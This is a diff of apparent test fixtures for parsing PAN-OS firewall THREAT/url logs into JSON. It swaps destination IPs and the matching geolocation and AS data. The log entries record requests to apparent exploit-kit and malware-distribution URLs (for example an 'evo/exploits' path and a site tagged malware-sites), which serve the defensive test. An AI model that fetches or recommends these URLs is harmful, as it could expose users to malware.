- "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "ingested": "2021-12-09T13:42:59.079012400Z",
+ "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x18.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "created": "2012-10-30T09:46:12.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -727,26 +722,25 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "204.232.231.46"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "rule1"
@@ -762,7 +756,7 @@
 },
 "ip": "192.168.0.2"
 },
- "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "panw": {
 "panos": {
 "ruleset": "rule1",
@@ -804,7 +798,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:GOqfpUTezPkpm6axBI22kY90kU4=",
+ "community_id": "1:36riPo5QLmTmjShd1xO6omV9lbg=",
 "transport": "tcp",
 "application": "web-browsing",
 "direction": "inbound"
@@ -841,14 +835,14 @@
 ],
 "ip": [
 "192.168.0.2",
- "204.232.231.46",
+ "175.16.199.1",
 "0.0.0.0"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:37:05.545344582Z",
- "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
+ "ingested": "2021-12-09T13:42:59.079018400Z",
+ "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,\"lsiu.info/evo/exploits/x19.php?o=2\u0026t=1241403746\u0026i=1365814122\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html",
 "created": "2012-10-30T09:46:12.000-04:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -871,26 +865,25 @@
 "destination": {
 "nat": {},
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-FL",
- "city_name": "Fort Lauderdale",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Florida",
+ "region_name": "Jilin",
 "location": {
- "lon": -80.1749,
- "lat": 26.1792
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 27357,
+ "number": 4837,
 "organization": {
- "name": "Rackspace Hosting"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 80,
- "ip": "204.232.231.46"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "rule1"
@@ -906,7 +899,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -948,7 +941,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:22ouAyA1O0KgUQOEKP20E7gNa2U=", + "community_id": "1:GY8jhTkAcplSQMn+CC7/azIV2gs=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -985,14 +978,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545351833Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079024200Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/load.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1015,26 +1008,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -1050,7 +1042,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -1092,7 +1084,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:phQpgsVhj3YxNYzeNkqdzDgcMCg=", + "community_id": "1:5JhT/ZcbuwDQS34hGqhKf01RQ34=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -1129,14 +1121,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545359103Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079030200Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,\"liteautobestguide.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1159,26 +1151,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -1194,7 +1185,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -1236,7 +1227,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:6kV576B7jMsBLC62npA6Dgi/zMI=", + "community_id": "1:JLt9t3wJPT2YYVwyev/DS8HhBiQ=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -1273,14 +1264,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545368815Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079036100Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,\"litetopdetect.cn/index.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1303,26 +1294,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -1338,7 +1328,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0\u0026uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1\u0026os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0\u0026uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1\u0026os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -1380,7 +1370,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:h+XKHvMK2Oz7QQvaJdhsJWE2c9E=", + "community_id": "1:AYXyX5+VIkDGOJnqe2YBg9tVR5g=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -1417,14 +1407,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545376617Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0\u0026uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1\u0026os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079042Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,\"lkmpmlm.com/fff9999.php?aid=0\u0026uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1\u0026os=513\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -1447,26 +1437,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -1482,7 +1471,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -1524,7 +1513,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Sa+u435/AIAAeEelFduJmiGLOv0=", + "community_id": "1:045bWPQTN726UkmixpDOZJC9Yi4=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -1561,14 +1550,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545383926Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079047800Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,\"girlteenxxxfreemov.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1591,26 +1580,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -1626,7 +1614,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -1668,7 +1656,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:C9009xCOuCuGvMPT4caMCizoYr0=", + "community_id": "1:H2dYyEhLqvaoBzgcR4r/ZZbNhd0=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -1705,14 +1693,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545391563Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079053900Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,\"imagesrepository.com/resolution.php\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1735,26 +1723,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -1770,7 +1757,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -1812,7 +1799,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BG6Rk6e+H9jRcZHXqRPFG4iA3uU=", + "community_id": "1:Khx1n7BSHDnacX/jmUf9qzaA43E=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -1849,14 +1836,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545398790Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079059800Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,\"hottestfiles.com/search/search.php?q=xxx\",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -1879,26 +1866,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -1914,7 +1900,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11\u0026parameter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,\"infodist1.com/in.cgi?11\u0026parameter=404\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -1955,7 +1941,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:YDMNSbru670DK5EMT3E28WFJPz4=", + "community_id": "1:jTZdxPnMPc+sLaxgXFcrsz+OuvQ=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
